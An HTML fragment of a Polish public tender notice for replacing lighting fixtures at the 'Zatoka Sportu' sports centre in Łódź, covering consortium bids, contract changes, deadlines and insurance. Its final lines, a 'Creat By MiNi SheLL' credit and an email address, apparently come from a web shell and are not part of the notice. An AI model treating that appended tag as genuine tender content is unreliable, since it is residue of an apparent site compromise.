pkt 10 ustawy Pzp.<br/><br/>Szczegółowe zapisy dotyczące wniesienia i zwrotu wadium zawarte są Rozdziale II pkt 10 SWZ. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1)W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie Wykonawcy w trybie art. 125 ust.1 ustawy Pzp, stanowiące Załącznik nr 4b i 5b do SWZ składa każdy z Wykonawców wspólnie ubiegających się o zamówienie.<br/>2)Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z Wykonawców wspólnie ubiegających się o zamówienie wykazuje spełnianie warunków udziału w postępowaniu zgodnie z art. 125 ust. 4 ustawy Pzp. (patrz też zapisy dot. konsorcjum).<br/>3) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą udokumentować, że łącznie spełniają warunki określone przez Zamawiającego.<br/>4) W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z Wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji których te zdolności są wymagane.<br/>5) Zgodnie z § 9 ust. 3 „ROZPORZĄDZENIA MINISTRA ROZWOJU, PRACY I TECHNOLOGII z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać Zamawiający od Wykonawcy, dalej „Rozporządzenie” Jeżeli Wykonawca powołuje się na doświadczenie w realizacji robót budowlanych,<br/>dostaw lub usług, wykonywanych wspólnie z innymi Wykonawcami:<br/>a) wykaz robót budowlanych dotyczy robót budowlanych, w których wykonaniu Wykonawca ten bezpośrednio uczestniczył;<br/>b) wykaz dostaw lub usług dotyczy dostaw lub usług, w których wykonaniu Wykonawca ten bezpośrednio uczestniczył, a w przypadku świadczeń powtarzających się lub ciągłych, w których wykonywaniu bezpośrednio uczestniczył lub uczestniczy.<br/><br/>Wspólne ubieganie się Wykonawców o udzielenie zamówienia (konsorcjum).<br/>W przypadku wspólnego ubiegania się wykonawców o udzielenie zamówienia w ramach konsorcjum należy:<br/>1) W Formularzu ofertowym należy wskazać firmy (nazwy) wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia (ten sam Wykonawca może być członkiem tylko jednego konsorcjum);<br/>2) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia wyznaczą spośród siebie pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego (tzw. lidera);<br/>3) Oferta musi być podpisana w taki sposób, by wiązała prawnie wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia. Osoba podpisująca ofertę musi posiadać umocowanie prawne do reprezentacji. Umocowanie musi wynikać z treści pełnomocnictwa załączonego do oferty – treść pełnomocnictwa powinna dokładnie określać zakres umocowania; Wszelka korespondencja będzie prowadzona przez zamawiającego wyłącznie z pełnomocnikiem.<br/>4) Zgodnie z art. 117 ust. 4 ustawy Pzp. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają odpowiednio do oferty oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni Wykonawcy;<br/>5) Zgodnie z art. 445 ust. 1 ustawy Pzp., Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, ponoszą solidarną odpowiedzialność za wykonanie umowy i wniesienie zabezpieczenia należytego wykonania umowy;<br/>6) W przypadku Wykonawców wykonujących działalność w formie spółki cywilnej postanowienia dot. oferty Wykonawców wspólnie ubiegających się o udzielenie zamówienia stosuje się odpowiednio;<br/>7) Zgodnie z art. 58 ust. 5 ustawy Pzp. zapisy SWZ dotyczące Wykonawcy stosuje się odpowiednio do Wykonawców wspólnie ubiegających się o udzielenie zamówienia;<br/>8) Jeżeli zostanie wybrana oferta wykonawców wspólnie ubiegających się o udzielenie zamówienia, Zamawiający może żądać przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych wykonawców.<br/><br/>Szczegóły - Rozdz. I pkt 3 SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zgodnie z art. 455 ust. 1 ustawy Pzp., Zamawiający dopuszcza możliwość zmiany postanowień Umowy w zakresie:<br/><br/>1) zmiany terminu wykonania, gdy zmiana taka wynika: <br/>a) z przyczyn leżących po stronie Zamawiającego, które utrudniają lub uniemożliwiają Wykonawcy realizację przedmiotu Umowy w terminach w niej przewidzianych, wówczas termin ulega zmianie o czas istnienia przeszkody powstałej w wyniku działania lub zaniechania Zamawiającego; <br/>b) w przypadku wystąpienia siły wyższej uniemożliwiającej wykonanie przedmiotu Umowy w umownym terminie – w takim przypadku termin realizacji Umowy może ulec przedłużeniu o czas niezbędny na usunięcie skutków działania siły wyższej; za siłę wyższą uważa się zdarzenie zewnętrzne, którego skutków nie da się przewidzieć, ani im zapobiec; <br/>w szczególności za siłę wyższą, z zachowaniem powyższego, będzie się uważać działania sił przyrody takie jak: huragan, trzęsienie ziemi, powódź, itp.; <br/>2) dostosowania postanowień Umowy do zmiany przepisów prawa w związku z wystąpieniem zmian w obowiązujących przepisach prawa w zakresie mającym wpływ na realizację Umowy,<br/>3) wystąpienia okoliczności, których Strony Umowy nie były w stanie przewidzieć pomimo zachowania należytej staranności,<br/>4)	wystąpienia rozbieżności lub niejasności w rozumieniu pojęć użytych w Umowie, których nie można usunąć w inny sposób, a zmiana będzie umożliwiać usunięcie rozbieżności i doprecyzowanie Umowy w celu jednoznacznej interpretacji jej zapisów przez Strony – <br/>w zakresie dostosowania Umowy do tych zmian,<br/>5) poprawienia omyłek pisarskich;<br/>6) zmiany treści Umowy w przypadku, gdy zaistnieje istotna zmiana okoliczności powodująca, że wykonanie Umowy w dotychczasowym brzmieniu nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia Umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-11-05 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://plodz.ezamawiajacy.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-11-05 11:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-12-05</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> UBEZPIECZENIE:<br/>W celu zabezpieczenia ryzyka związanego z powstaniem szkód podczas realizacji zamówienia Wykonawca zobowiązany jest posiadać w trakcie realizacji niniejszej Umowy aktualną polisę od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z Przedmiotem Zamówienia na kwotę min. 1 000 000,00 PLN (słownie: jeden milion, 00/100 PLN), obejmującą odpowiedzialność kontraktową oraz z tytułu czynu niedozwolonego (odpowiedzialność deliktowa).<br/>Wykonawca będzie zobowiązany do przedłożenia Zamawiającemu kopii wyżej wymienionego dokumentu wraz z dowodem uiszczenia należnej składki przed zawarciem Umowy.<br/><br/>WIZJA LOKALNA:<br/>Zamawiający zaleca przed ustaleniem ceny oferty, odwiedzenie i sprawdzenie miejsca przyszłej realizacji Przedmiotu Zamówienia, sprawdzenie jego otoczenia i miejscowych uwarunkowań, które mogą mieć wpływ na cenę oferty.<br/>Odbycie wizji lokalnej jest fakultatywne i jej nie odbycie nie powoduje żadnych negatywnych skutków dla wykonawcy, który złoży ofertę (np. odrzucenie oferty).<br/>Wykonawcy uczestniczą w wizji lokalnej na swój koszt i ryzyko.<br/>Warunkiem uczestnictwa w wizji lokalnej jest zgłoszenie w formie wniosku na adres e-mail: zatokasportu@info.p.lodz.pl na co najmniej jeden dzień przed proponowanym terminem.<br/><br/>UZASADNIENIE BRAKU PODZIAŁU ZAMÓWIENIA NA CZĘŚCI:<br/>Brak podziału na części podyktowany jest specyfiką wykonania zamówienia.<br/>Niniejsze zamówienie dotyczy dostawy i wymiany opraw oświetleniowych w obiekcie ACSD PŁ „Zatoka Sportu” w Łodzi. <br/>Wykonanie poszczególnych etapów prac (dostawa / demontaż / montaż) powiązane jest ze sobą funkcjonalnie i nierozerwalnie, a ich podział prowadziłby do utrudnień organizacyjnych i technicznych, tym bardziej, że:<br/>- realizacja prowadzona jest w czynnym obiekcie,<br/>- zakres prac wymaga właściwej koordynacji,<br/>- Wykonawca zobowiązany jest do przejęcia całkowitej odpowiedzialności za swoje działania w obiekcie,<br/>Zamawiający uznał, że zamówienie powinno być wykonane w całości przez jednego Wykonawcę również z uwagi na kwestie związane z uprawnieniami gwarancyjnymi dla dostarczonej i zamontowanej serii opraw (powierzenie zamówienia kilku Wykonawcom utrudniłoby działania logistyczne w kontekście uprawnień gwarancyjnych). <br/>Ponadto podział zamówienia na części miałby sztuczny charakter i z pewnością nie pozwoliłby na uzyskanie tzw. efektu skali, czyli zakupu opraw w większej ilości, a co za tym idzie uzyskanie niższej ceny realizacji zamówienia, co jest korzystne z punktu widzenia finansów publicznych.<br/>Zakres zamówienia nie stanowi problemu w realizacji przez małe i średnie przedsiębiorstwa, czym wpisuje się w treść motywu (78) dyrektywy klasycznej nr 2014/24/UE z dnia 26 lutego 2014 r., a tym samym nie powoduje ograniczenia konkurencyjności wśród wykonawców.<br/><br/>WYMAGANIA WOBEC PRZEDMIOTU ZAMÓWIENIA opisane zostały w SWZ i załącznikach. Pamiętać należy, że:<br/>1)	Bezwzględnym bez wymogiem jest, by dostarczone i zamontowane oprawy współpracowały z istniejącym nadrzędnym systemem sterowania oświetleniem BMS oraz w trybie „impreza” przechodziły pod całkowitą kontrolę z konsolety DMX pozwalając na sterowanie każdą pojedynczą oprawą (4 oprawy białe w gronie). <br/>2)	Mając na uwadze aktualną sytuację geopolityczną Polski, istotne aspekty społeczne oraz potrzebę przeciwdziałania agresji Rosji na Ukrainę, Zamawiający wyklucza możliwość używania przez wykonawcę do realizacji zamówienia materiałów pochodzących z Republiki Białorusi lub Federacji Rosyjskiej.

Creat By MiNi SheLL
Email: jattceo@gmail.com